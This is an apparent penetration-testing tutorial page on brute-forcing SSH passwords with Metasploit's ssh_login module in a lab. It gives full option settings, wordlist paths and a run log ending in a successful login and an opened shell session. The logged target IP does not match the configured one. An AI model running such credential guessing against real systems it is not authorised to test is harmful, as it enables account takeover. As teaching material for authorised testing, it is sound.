Skip to main content Link Menu Expand (external link) Document Search Copy Copied
Penetration Testing

SSH-Bruteforce

Note: This attacking method is quite slow and should be used with a pre-selected collection of passwords.

How it works

Setup

# starting the attacking tool
$ sudo msfdb run
# activating the ssh-attacking tool
msf6 > use auxiliary/scanner/ssh/ssh_login
# should look something like this
msf6 auxiliary(scanner/ssh/ssh_login) >
# this options shows you where the attack is (makes it harder to analyze afterwards with many passwords)
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
# only activate if you attempt for one user only. If you use a USER_FILE or only want one pair of credentials then don't use this
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
# select the target machine (multiple are allowed)
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.20.30.2
# only with multiple targets (one thread per target)
msf6 auxiliary(scanner/ssh/ssh_login) > set THREADS x
# select the right user (if you know him)
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME user
# Only if you don't know USERNAME. this is a good selection if you don't know the user
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /usr/share/wordlists/metasploit/http_default_users.txt
# I recommend this file (see note at the top) or another one from the password-lists mentioned in `Attacks`
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/adobe_top100_pass.txt

Execution

$ sudo msfdb run
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.20.30.2
msf6 auxiliary(scanner/ssh/ssh_login) > set THREADS x
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME user
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /usr/share/wordlists/metasploit/http_default_users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/adobe_top100_pass.txt

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 10.20.30.4:22 - Starting bruteforce
[-] 10.20.30.4:22 - Failed: 'vboxuser:123456'
[-] 10.20.30.4:22 - Failed: 'vboxuser:12345'
[-] 10.20.30.4:22 - Failed: 'vboxuser:123456789'
[-] 10.20.30.4:22 - Failed: 'vboxuser:password'
[-] 10.20.30.4:22 - Failed: 'vboxuser:iloveyou'
[-] 10.20.30.4:22 - Failed: 'vboxuser:princess'
[-] 10.20.30.4:22 - Failed: 'vboxuser:1234567'
[-] 10.20.30.4:22 - Failed: 'vboxuser:rockyou'
[-] 10.20.30.4:22 - Failed: 'vboxuser:12345678'
[-] 10.20.30.4:22 - Failed: 'vboxuser:abc123'
[-] 10.20.30.4:22 - Failed: 'vboxuser:nicole'
[-] 10.20.30.4:22 - Failed: 'vboxuser:daniel'
[-] 10.20.30.4:22 - Failed: 'vboxuser:babygirl'
[-] 10.20.30.4:22 - Failed: 'vboxuser:monkey'
... # here are all the attemps. This may take a very long time
[+] 10.20.30.4:22 - Success: 'vboxuser:login' 'uid=1000(vboxuser) gid=1000(vboxuser) groups=1000(vboxuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux ubuntu-desktop-vbox 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session X opened (10.20.30.3:37325 -> 10.20.30.2:22) at 20XX-XX-XX --:--:-- +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed